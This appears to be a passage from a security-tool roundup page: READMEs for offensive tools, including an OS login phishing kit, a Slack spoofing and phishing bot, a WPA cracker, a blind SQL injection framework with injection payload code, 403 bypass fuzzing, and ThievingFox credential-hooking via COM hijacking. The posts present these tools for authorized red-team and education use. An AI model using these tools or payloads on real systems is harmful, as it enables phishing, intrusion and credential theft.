
Mass-Assigner - Simple Tool Made To Probe For Mass Assignment Vulnerability Through JSON Field Modification In HTTP Requests

By: Zion3R


Mass Assigner is a powerful tool designed to identify and exploit mass assignment vulnerabilities in web applications. It achieves this by first retrieving data from a specified request, such as fetching user profile data. Then, it systematically attempts to apply each parameter extracted from the response to a second request provided, one parameter at a time. This approach allows for the automated testing and exploitation of potential mass assignment vulnerabilities.
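
For context, a typical probe has the shape below (a minimal sketch using the requests library; the endpoint, field names, and token are hypothetical, and this is not Mass Assigner's actual code):

```python
import requests

BASE = "http://example.com/api/v1/me"          # hypothetical endpoint
HEADERS = {"Authorization": "Bearer XXX"}      # hypothetical token

# 1. Fetch the object to learn which fields the server exposes.
profile = requests.get(BASE, headers=HEADERS).json()  # e.g. {"name": "a", "email": "...", "role": "user"}

# 2. Re-submit each field on its own and watch for one being silently accepted.
for field, value in profile.items():
    resp = requests.put(BASE, headers=HEADERS, json={field: value})
    print(field, resp.status_code, len(resp.content))
```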


Disclaimer

This tool actively modifies server-side data. Please ensure you have proper authorization before use. Any unauthorized or illegal activity using this tool is entirely at your own risk.

Features

  • Enables the addition of custom headers within requests
  • Offers customization of various HTTP methods for both origin and target requests
  • Supports rate-limiting to manage request thresholds effectively
  • Provides the option to specify "ignored parameters" which the tool will ignore during execution
  • Improved support for nested arrays/objects inside JSON data in responses

What's Next

  • Support additional content types, such as "application/x-www-form-urlencoded"

Installation & Usage

Install requirements

pip3 install -r requirements.txt

Run the script

python3 mass_assigner.py --fetch-from "http://example.com/path-to-fetch-data" --target-req "http://example.com/path-to-probe-the-data"

Arguments

Mass Assigner accepts the following arguments:

  -h, --help            show this help message and exit
  --fetch-from FETCH_FROM
                        URL to fetch data from
  --target-req TARGET_REQ
                        URL to send modified data to
  -H HEADER, --header HEADER
                        Add a custom header. Format: 'Key: Value'
  -p PROXY, --proxy PROXY
                        Use Proxy, Usage i.e: http://127.0.0.1:8080.
  -d DATA, --data DATA  Add data to the request body. JSON is supported with escaping.
  --rate-limit RATE_LIMIT
                        Number of requests per second
  --source-method SOURCE_METHOD
                        HTTP method for the initial request. Default is GET.
  --target-method TARGET_METHOD
                        HTTP method for the modified request. Default is PUT.
  --ignore-params IGNORE_PARAMS
                        Parameters to ignore during modification, separated by comma.

Example Usage:

python3 mass_assigner.py --fetch-from "http://example.com/api/v1/me" --target-req "http://example.com/api/v1/me" --header "Authorization: Bearer XXX" --proxy "http://proxy.example.com" --data '{\"param1\": \"test\", \"param2\":true}'



Thief Raccoon - Login Phishing Tool

By: Zion3R


Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password management.


Features

  • Phishing simulation for Windows 10, Windows 11, Windows XP, Windows Server, Ubuntu, Ubuntu Server, and macOS.
  • Capture user credentials for educational demonstrations.
  • Customizable login screens that mimic real operating systems.
  • Full-screen mode to enhance the phishing simulation.

Installation

Prerequisites

  • Python 3.x
  • pip (Python package installer)
  • ngrok (for exposing the local server to the internet)

Download and Install

  1. Clone the repository:

```bash
git clone https://github.com/davenisc/thief_raccoon.git
cd thief_raccoon
```

  2. Install python venv:

```bash
apt install python3.11-venv
```

  3. Create and activate the venv:

```bash
python -m venv raccoon_venv
source raccoon_venv/bin/activate
```

  4. Install the required libraries:

```bash
pip install -r requirements.txt
```

Usage

  1. Run the main script:

```bash
python app.py
```

  2. Select the operating system for the phishing simulation:

After running the script, you will be presented with a menu to select the operating system. Enter the number corresponding to the OS you want to simulate.

  3. Access the phishing page:

If you are on the same local network (LAN), open your web browser and navigate to http://127.0.0.1:5000.

If you want to make the phishing page accessible over the internet, use ngrok.

Using ngrok

  1. Download and install ngrok:

Download ngrok from ngrok.com and follow the installation instructions for your operating system.

  2. Expose your local server to the internet (see the ngrok http command under "Deploy your app online" below):

  3. Get the public URL:

After running the above command, ngrok will provide you with a public URL. Share this URL with your test subjects to access the phishing page over the internet.

How to install Ngrok on Linux?

  1. Install ngrok via Apt with the following command:

```bash
curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc \
  | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \
  && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \
  | sudo tee /etc/apt/sources.list.d/ngrok.list \
  && sudo apt update \
  && sudo apt install ngrok
```

  2. Run the following command to add your authtoken to the default ngrok.yml:

```bash
ngrok config add-authtoken xxxxxxxxx--your-token-xxxxxxxxxxxxxx
```

Deploy your app online

  1. Put your app online at an ephemeral domain forwarding to your upstream service. For example, since Thief Raccoon listens on http://localhost:5000, run:

```bash
ngrok http http://localhost:5000
```

Example

  1. Run the main script:

```bash
python app.py
```

  2. Select Windows 11 from the menu:

```
Select the operating system for phishing:
1. Windows 10
2. Windows 11
3. Windows XP
4. Windows Server
5. Ubuntu
6. Ubuntu Server
7. macOS
Enter the number of your choice: 2
```

  3. Access the phishing page:

Open your browser and go to http://127.0.0.1:5000 or the ngrok public URL.

Disclaimer

This tool is intended for educational purposes only. The author is not responsible for any misuse of this tool. Always obtain explicit permission from the owner of the system before conducting any phishing tests.

License

This project is licensed under the MIT License. See the LICENSE file for details.

ScreenShots

Credits

Developer: @davenisc Web: https://davenisc.com



ROPDump - A Command-Line Tool Designed To Analyze Binary Executables For Potential Return-Oriented Programming (ROP) Gadgets, Buffer Overflow Vulnerabilities, And Memory Leaks

By: Zion3R


ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.


Features

  • Identifies potential ROP gadgets in binary executables.
  • Detects potential buffer overflow vulnerabilities by analyzing vulnerable functions.
  • Generates exploit templates to make the exploitation process faster.
  • Identifies potential memory leak vulnerabilities by analyzing memory allocation functions.
  • Can print function names and addresses for further analysis.
  • Supports searching for specific instruction patterns.

Usage

  • <binary>: Path to the binary file for analysis.
  • -s, --search SEARCH: Optional. Search for specific instruction patterns.
  • -f, --functions: Optional. Print function names and addresses.

Examples

  • Analyze a binary without searching for specific instructions:

python3 ropdump.py /path/to/binary

  • Analyze a binary and search for specific instructions:

python3 ropdump.py /path/to/binary -s "pop eax"

  • Analyze a binary and print function names and addresses:

python3 ropdump.py /path/to/binary -f



EvilSlackbot - A Slack Bot Phishing Framework For Red Teaming Exercises

By: Zion3R

EvilSlackbot

A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.

Disclaimer

This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.


Background

Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually granted permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an API token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, and files, and to search for secrets leaked in Slack.
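
As a point of reference, verifying what a recovered token is tied to takes only a few lines with the slackclient package the tool depends on (a hedged sketch, not part of EvilSlackbot itself; the token value is a placeholder):

```python
from slack import WebClient  # installed by `pip3 install slackclient`
from slack.errors import SlackApiError

client = WebClient(token="xoxb-XXXXXXXX-placeholder")

try:
    identity = client.auth_test()  # returns workspace, team, and bot-user info for the token
    print(identity["team"], identity["user"], identity["user_id"])
except SlackApiError as err:
    print("Token rejected:", err.response["error"])
```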

Phishing Simulations

In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of the employees you would like to test with simulated phishes (links, files, spoofed messages).

Installation

EvilSlackbot requires python3 and Slackclient

pip3 install slackclient

Usage

usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
                       [-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]

options:
  -h, --help            show this help message and exit

Required:
  -t TOKEN, --token TOKEN
                        Slack Oauth token

Attacks:
  -sP, --spoof          Spoof a Slack message, customizing your name, icon, etc
                        (Requires -e,-eL, or -cH)
  -m, --message         Send a message as the bot associated with your token
                        (Requires -e,-eL, or -cH)
  -s, --search          Search slack for secrets with a keyword
  -a, --attach          Send a message containing a malicious attachment (Requires -f
                        and -e,-eL, or -cH)

Arguments:
  -f FILE, --file FILE  Path to file attachment
  -e EMAIL, --email EMAIL
                        Email of target
  -cH CHANNEL, --channel CHANNEL
                        Target Slack Channel (Do not include #)
  -eL EMAIL_LIST, --email_list EMAIL_LIST
                        Path to list of emails separated by newline
  -c, --check           Lookup and display the permissions and available attacks
                        associated with your provided token.
  -o OUTFILE, --outfile OUTFILE
                        Outfile to store search results
  -cL, --channel_list   List all public Slack channels

Token

To use this tool, you must provide an xoxb or xoxp token.

Required:
-t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
python3 EvilSlackbot.py -t <token>

Attacks

Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.

Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)

-m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)

-s, --search Search slack for secrets with a keyword

-a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)

Spoofed messages (-sP)

With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to look up the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>
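
Under the hood, a spoofed message of this kind boils down to two Slack Web API calls, roughly as sketched below with the slackclient package (illustrative only, not EvilSlackbot's code; the email, text, and icon URL are placeholders, and the name/icon override is only honored if the token carries the chat:write.customize scope):

```python
from slack import WebClient

client = WebClient(token="xoxb-XXXXXXXX-placeholder")

# Resolve the target's Slack ID from their email address.
user_id = client.users_lookupByEmail(email="target@example.com")["user"]["id"]

# Post a message while overriding the sender's display name and icon.
# Passing the user ID as the channel delivers it as a direct message; a channel name works too.
client.chat_postMessage(
    channel=user_id,
    text="Simulated phishing message with your test link",
    username="IT Helpdesk",                      # spoofed display name
    icon_url="https://example.com/helpdesk.png", # spoofed avatar
)
```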

Phishing Messages (-m)

With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to look up the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>

Secret Search (-s)

With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires an xoxp token, as xoxb tokens cannot be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.

python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>

Attachments (-a)

With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to look up the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>

Arguments

Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL Email of target
-cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks associated with your provided token.
-o OUTFILE, --outfile OUTFILE Outfile to store search results
-cL, --channel_list List all public Slack channels

Channel Search

With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.

python3 EvilSlackbot.py -t <xoxb token> -cL


Pyrit - The Famous WPA Precomputed Cracker

By: Zion3R


Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication-phase data in a space-time trade-off. By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols.

WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre-shared key. This master key is derived from a password which the administrating user has to pre-configure, e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate subsequent traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home and small-office use, at the cost of making the protocol vulnerable to brute-force attacks against its key negotiation phase; such an attack can ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force attacks even more alluring to the attacker. For more background see this article on the project's blog (outdated).
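
Concretely, the pre-computable part is the PBKDF2-HMAC-SHA1 derivation of the Pairwise Master Key from the passphrase and the SSID, which the Python standard library can reproduce (a sketch for illustration only; the SSID and passphrase are placeholders):

```python
import hashlib

ssid = b"MyHomeNetwork"        # placeholder network name (acts as the salt)
passphrase = b"correct horse"  # placeholder pre-shared passphrase

# WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256-bit output)
pmk = hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, dklen=32)
print(pmk.hex())
```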


The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.

Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms, including FreeBSD, MacOS X and Linux as operating systems and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.

Attacking WPA/WPA2 by brute force boils down to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10,000 PMKs per second is equivalent to hashing 9.8 gigabytes of data with SHA1 in one second.
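
A quick back-of-the-envelope check of those figures (an approximation; the exact byte count per HMAC depends on padding details and key-pad precomputation):

```python
# A 256-bit PMK needs two PBKDF2 output blocks, each costing 4096 HMAC-SHA1 iterations;
# with precomputed key pads, one HMAC-SHA1 is roughly two 64-byte SHA1 compressions,
# i.e. about 128 bytes of hashed data per HMAC.
iterations = 4096
output_blocks = 2
bytes_per_hmac = 128

bytes_per_pmk = iterations * output_blocks * bytes_per_hmac
print(bytes_per_pmk)                   # 1048576 -> exactly one megabyte per PMK
print(10_000 * bytes_per_pmk / 2**30)  # ~9.77 -> the "9.8 gigabytes" per second quoted above
```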

These are examples of how multiple computational nodes can access a single storage server in the various ways provided by Pyrit:

  • A single storage (e.g. a MySQL-server)
  • A local network that can access the storage-server directly and provide four computational nodes on various levels with only one node actually accessing the storage server itself.
  • Another, untrusted network can access the storage through Pyrit's RPC interface and provides three computational nodes, two of which actually access the RPC interface.

What's new

  • Fixed #479 and #481
  • Pyrit CUDA now compiles in OSX with Toolkit 7.5
  • Added use_CUDA and use_OpenCL in config file
  • Improved cores listing and managing
  • limit_ncpus now disables all CPUs when set to value <= 0
  • Improve CCMP packet identification, thanks to yannayl

See CHANGELOG file for a better description.

How to use

Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

How to participate

You may want to read this wiki entry if you are interested in porting Pyrit to a new hardware platform. For contributions or bug reports, please submit an issue (https://github.com/JPaulMora/Pyrit/issues).



Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

By: Zion3R


Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

Hakuin has been presented at esteemed academic and industrial conferences:
  • BlackHat MEA, Riyadh, 2023
  • Hack in the Box, Phuket, 2023
  • IEEE S&P Workshop on Offensive Technology (WOOT), 2023

More information can be found in our paper and slides.


Installation

To install Hakuin, simply run:

pip3 install hakuin

Developers should install the package locally and set the -e flag for editable mode:

git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .

Examples

Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from Requester and override the request method. The method must determine whether the query resolved to True or False.

Example 1 - Query Parameter Injection with Status-based Inference
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
    async def request(self, ctx, query):
        r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
        return r.status == 200

Example 2 - Header Injection with Content-based Inference

class ContentRequester(Requester):
    async def request(self, ctx, query):
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        r = await aiohttp.get(f'http://vuln.com/', headers=headers)
        return 'found' in await r.text()

To start extracting data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
    ...

async def main():
    # requester: Use this Requester
    # dbms: Use this DBMS
    # n_tasks: Spawns N tasks that extract column rows in parallel
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(main())

Now that everything is set, you can start extracting DB metadata.

Example 1 - Extracting DB Schemas
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
Example 2 - Extracting Tables
tables = await ext.extract_table_names(strategy='model')
Example 3 - Extracting Columns
columns = await ext.extract_column_names(table='users', strategy='model')
Example 4 - Extracting Tables and Columns Together
metadata = await ext.extract_meta(strategy='model')

Once you know the structure, you can extract the actual content.

Example 1 - Extracting Generic Columns
# text_strategy:    Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
Example 2 - Extracting Textual Columns
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
Example 3 - Extracting Integer Columns
res = await ext.extract_column_int(table='users', column='id')
Example 4 - Extracting Float Columns
res = await ext.extract_column_float(table='products', column='price')
Example 5 - Extracting Blob (Binary Data) Columns
res = await ext.extract_column_blob(table='users', column='id')

More examples can be found in the tests directory.

Using Hakuin from the Command Line

Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

python3 hk.py -h

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
  title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
  author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
  booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
  pages={384--393},
  year={2023},
  organization={IEEE}
}


BypassFuzzer - Fuzz 401/403/404 Pages For Bypasses

By: Zion3R


The original 403fuzzer.py :)

Fuzz 401/403ing endpoints for bypasses

This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACLs or URL validation.

It will output the response codes and length for each request, in a nicely organized, color-coded way so things are readable.

I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.

You can now feed it raw HTTP requests that you save to a file from Burp.

Follow me on twitter! @intrudir


Usage

usage: bypassfuzzer.py -h

Specifying a request to test

Best method: Feed it a raw HTTP request from Burp!

Simply paste the request into a file and run the script!
- It will parse and use cookies & headers from the request.
- Easiest way to authenticate for your requests

python3 bypassfuzzer.py -r request.txt

Using other flags

Specify a URL

python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html

Specify cookies to use in requests:
some examples:

--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"

Specify a method/verb and body data to send

bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"

Specify custom headers to use with every request. Maybe you need to add some kind of auth header like Authorization: bearer <token>

Specify -H "header: value" for each additional header you'd like to add:

bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"

Smart filter feature!

Based on response code and length. If it sees a response 8 times or more it will automatically mute it.

The repeat threshold is changeable in the code until I add an option to specify it via a flag

NOTE: Can't be used simultaneously with -hc or -hl (yet)

# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart

Specify a proxy to use

Useful if you wanna proxy through Burp

bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080

Skip sending header payloads or url payloads

# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers

# Skip sending path normalization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls

Hide response code/length

Provide comma delimited lists without spaces. Examples:

# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400

# Hide response lengths of 638
bypassfuzzer.py -u https://example.com/forbidden -hl 638

TODO

  • [x] Automatically check other methods/verbs for bypass
  • [x] absolute domain attack
  • [ ] Add HTTP/2 support
  • [ ] Looking for ideas. Ping me on twitter! @intrudir


SQLMC - Check All Urls Of A Domain For SQL Injections

By: Zion3R


SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.

Features

  • Scans a domain for SQL injection vulnerabilities
  • Crawls the given URL up to a specified depth
  • Checks each link for SQL injection vulnerabilities
  • Reports vulnerabilities along with server information and depth

Installation

  1. Install the required dependencies:

```bash
pip3 install sqlmc
```

Usage

Run sqlmc with the following command-line arguments:

  • -u, --url: The URL to scan (required)
  • -d, --depth: The depth to scan (required)
  • -o, --output: The output file to save the results

Example usage:

sqlmc -u http://example.com -d 2

Replace http://example.com with the URL you want to scan and 2 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.

The tool will then perform the scan and display the results.

ToDo

  • Check for multiple GET params
  • Better injection checker trigger methods

Credits

License

This project is licensed under the GNU Affero General Public License v3.0.



HardeningMeter - Open-Source Python Tool Carefully Designed To Comprehensively Assess The Security Hardening Of Binaries And Systems

By: Zion3R


HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, and the NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. HardeningMeter supports all Linux distributions and machine-readable output; the results can be printed to the screen in a table format or exported to a CSV file. (For more information see the Documentation.md file.)
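
For intuition, two of those checks (stack canary and RELRO) can be approximated with nothing more than readelf, which is also one of the tool's stated prerequisites. The sketch below is illustrative only and is not HardeningMeter's own logic:

```python
import subprocess

def readelf(flag: str, path: str) -> str:
    """Run readelf with the given flag and return its stdout."""
    return subprocess.run(["readelf", flag, path], capture_output=True, text=True).stdout

binary = "/bin/cp"  # same binary as the example scan below

symbols = readelf("-s", binary)   # symbol table
segments = readelf("-l", binary)  # program headers
dynamic = readelf("-d", binary)   # dynamic section

print("Stack canary:", "__stack_chk_fail" in symbols)
print("RELRO segment:", "GNU_RELRO" in segments)
print("Full RELRO (BIND_NOW):", "BIND_NOW" in dynamic)  # rough heuristic
```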


Execute Scanning Example

Scan the '/bin/cp' binary and the system hardening status:

python3 HardeningMeter.py -f /bin/cp -s

Installation Requirements

Before installing HardeningMeter, make sure your machine has the following:
  1. readelf and file commands
  2. Python version 3
  3. pip
  4. tabulate

pip install tabulate

Install HardeningMeter

The very latest developments can be obtained via git.

Clone or download the project files (no compilation nor installation is required)

git clone https://github.com/OfriOuzan/HardeningMeter

Arguments

-f --file

Specify the files you want to scan; the argument can take more than one file separated by spaces.

-d --directory

Specify the directory you want to scan; the argument takes one directory and scans all ELF files recursively.

-e --external

Specify whether you want to add external checks (False by default).

-m --show_missing

Prints, in order, only those files that are missing security hardening mechanisms and need extra attention.

-s --system

Specify if you want to scan the system hardening methods.

-c --csv_format

Specify if you want to save the results to csv file (results are printed as a table to stdout by default).

Results

HardeningMeter's results are printed as a table and consist of 3 different states:
  • (X) - the binary hardening mechanism is disabled.
  • (V) - the binary hardening mechanism is enabled.
  • (-) - the binary hardening mechanism is not relevant in this particular case.

Notes

When the default language on Linux is not English make sure to add "LC_ALL=C" before calling the script.



ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

By: Zion3R


ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and Windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internal functions to gather credentials.

The accompanying blog post can be found here


Installation

Linux

Rustup must be installed; follow the instructions available here: https://rustup.rs/

The mingw-w64 package must be installed. On Debian, this can be done using:

apt install mingw-w64

Both x86 and x86_64 windows targets must be installed for Rust:

rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu

Mono and Nuget must also be installed; instructions are available here: https://www.mono-project.com/download/stable/#download-lin

After adding Mono repositories, Nuget can be installed using apt:

apt install nuget

Finally, Python dependencies must be installed:

pip install -r client/requirements.txt

ThievingFox works with python >= 3.11.

Windows

Rustup must be installed; follow the instructions available here: https://rustup.rs/

Both x86 and x86_64 windows targets must be installed for Rust:

rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc

.NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

Finally, Python dependencies must be installed:

pip install -r client/requirements.txt

ThievingFox works with python >= 3.11

NOTE: On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developer PowerShell (Tools > Command Line > Developer PowerShell).

Targets

All modules have been tested on the following Windows versions:

Windows Version
Windows Server 2022
Windows Server 2019
Windows Server 2016
Windows Server 2012R2
Windows 10
Windows 11

[!CAUTION] Modules have not been tested on other versions, and are expected not to work.

Application                                Injection Method
KeePass.exe                                AppDomainManager Injection
KeePassXC.exe                              DLL Proxying
LogonUI.exe (Windows Login Screen)         COM Hijacking
consent.exe (Windows UAC Popup)            COM Hijacking
mstsc.exe (Windows default RDP client)     COM Hijacking
RDCMan.exe (Sysinternals' RDP client)      COM Hijacking
MobaXTerm.exe (3rd party RDP client)       COM Hijacking

Usage

[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

ThievingFox contains 3 main modules : poison, cleanup and collect.

Poison

For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that matches the properties of the original DLL, uploads it to the server, and modifies the registry if needed to perform COM hijacking.

To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

--mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only currently logged-in users (all users that have an HKCU hive) are impacted.
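
To make the HKCU/HKCR distinction concrete: COM hijacking of this kind revolves around the InProcServer32 value of a CLSID the target process loads, registered either per user (HKCU\Software\Classes) or machine-wide (HKCR). The read-only sketch below only shows where such an override would live; the CLSID is a placeholder and this is not ThievingFox's implementation:

```python
import winreg

CLSID = "{00000000-0000-0000-0000-000000000000}"  # placeholder CLSID of a COM class the target loads

def inprocserver32(hive, subkey):
    """Return the DLL registered under hive\\subkey, or None if no override is present."""
    try:
        with winreg.OpenKey(hive, subkey) as key:
            return winreg.QueryValueEx(key, "")[0]
    except FileNotFoundError:
        return None

# Per-user override: what the default poison mode writes into each logged-in user's HKCU hive.
print("HKCU:", inprocserver32(winreg.HKEY_CURRENT_USER,
                              rf"Software\Classes\CLSID\{CLSID}\InProcServer32"))
# Machine-wide view: what the --*-poison-hkcr options target instead.
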